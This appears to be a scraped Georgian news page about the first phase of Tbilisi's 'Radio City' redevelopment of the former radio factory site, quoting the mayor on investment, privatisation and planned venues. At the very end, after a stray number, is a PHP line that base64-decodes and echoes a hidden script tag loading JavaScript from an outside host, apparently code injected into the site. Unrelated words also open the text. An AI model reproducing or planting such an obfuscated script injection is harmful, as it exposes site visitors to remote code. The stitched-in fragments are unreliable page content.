celsiusi
ავერსი შნაიდერი

 რადიოქალაქის პროექტის პირველი ფაზა რამდენიმე დღეში სრულდება, რის შედეგადაც საზოგადოებისთვის ხელმისაწვდომი გახდება ტერიტორიის ნაწილი, რომელიც რეკრეაციულ, სამუშაო, საკონცერტო, საგამოფენო და სპორტულ სივრცეებს აერთიანებს,- ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ მთავრობის სხდომაზე განაცხადა.

მისივე თქმით, ტერიტორიაზე უკვე მოეწყო D Block-ის საერთო სამუშაო სივრცე, რესტორანი და პადელის კორტები.
„როგორც თქვენთვის ცნობილია, 2017 წელს ჩვენს ერთ-ერთი წინასაარჩევნო დაპირება იყო მუხიანის დასახლებაში, ყოფილი „რადიოქარხნის“ ტერიტორიის განვითარება და მისი ერთ-ერთ მიზიდულობის ცენტრად გარდაქმნა. მუნიციპალიტეტის ხელისუფლებაში მოსვლის დღიდან ამ პროექტის განხორციელებაზე აქტიურად დავიწყეთ მუშაობა: შევიმუშავეთ პროექტის განხორციელების კონცეფცია და 2019 წელს, აუქციონში გამარჯვებულ შპს „ინდუსტრიულ ქალაქთან“ („აჭარა ჯგუფში“ შემავალი კომპანია) დავდეთ ხელშეკრულება, რომლითაც კომპანიას საკუთრებაში გადაეცა ყოფილი „რადიოქარხნის“ ტერიტორია. კომპანიამ აღნიშნული ქონების პრივატიზების სანაცვლოდ, მერიის ბიუჯეტში გადაიხადა 23 მლნ ლარზე მეტი.
რადიოქალაქის ტერიტორია 12 ჰექტარს მოიცავს. პროექტის ჯამური ინვესტიცია 90 მილიონ ლარამდეა, საიდანაც უკვე დახარჯულია 43 მილიონი ლარი.
რადიოქალაქი გააერთიანებს 10-ზე მეტ ინდუსტრიას, 35-ზე მეტ სექტორს და ხელს შეუწყობს 200-ზე მეტი ეკონომიკური საქმიანობის წამოწყებას, რაც შექმნის მრავალ შესაძლებლობას ადგილობრივი მოსახლეობისთვის.
მის უნიკალურობას განაპირობებს ისიც, რომ ის იგი თბილისის გარეუბანში შექმნის საინტერესო მიზიდულობის ცენტრს და ინოვაციურ სივრცეს.
რადიოქალაქი გახდება ტექნოლოგიური სტარტაპების, საგანმანათლებლო პროგრამების, ტექ-კომპანიების, ადგილობრივი თუ საერთაშორისო ორგანიზაციების თავშეყრის ადგილი. პროექტის განხორციელება ხელს შეუწყობს სხვადასხვა დარგის პროფესიონალებს შორის ახალი კავშირებისა და ცოდნის მიმოცვლას.
პროექტის პირველი ფაზა სულ რამდენიმე დღეში სრულდება, რის შედეგადაც საზოგადოებისთვის ხელმისაწვდომი გახდება ტერიტორიის ნაწილი, რომელიც რეკრეაციულ, სამუშაო, საკონცერტო, საგამოფენო და სპორტულ სივრცეებს აერთიანებს.
ტერიტორიაზე უკვე მოეწყო D Block-ის საერთო სამუშაო სივრცე, რესტორანი და პადელის კორტები. პროექტის გამორჩეული სივრცეა ღონისძიებებისთვის განკუთვნილი სივრცე, რომელსაც შესაძლებლობა ექნება, 8 000-დან 10 000-მდე ადამიანს უმასპინძლოს.სივრცეში ჩატარდება მრავალფეროვანი ფესტივალები, ტექ-სამიტები, სახელოვნებო გამოფენები, საერთაშორისო ექსპოზიციები თუ კონცერტები. ამ ეტაპზე პროექტის დანარჩენ ტერიტორიაზე აქტიურად გრძელდება სამუშოები. პროექტი 2025 წლის ბოლოს უნდა დასრულდეს“, - აღნიშნულია ინფორმაციაში.
92
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");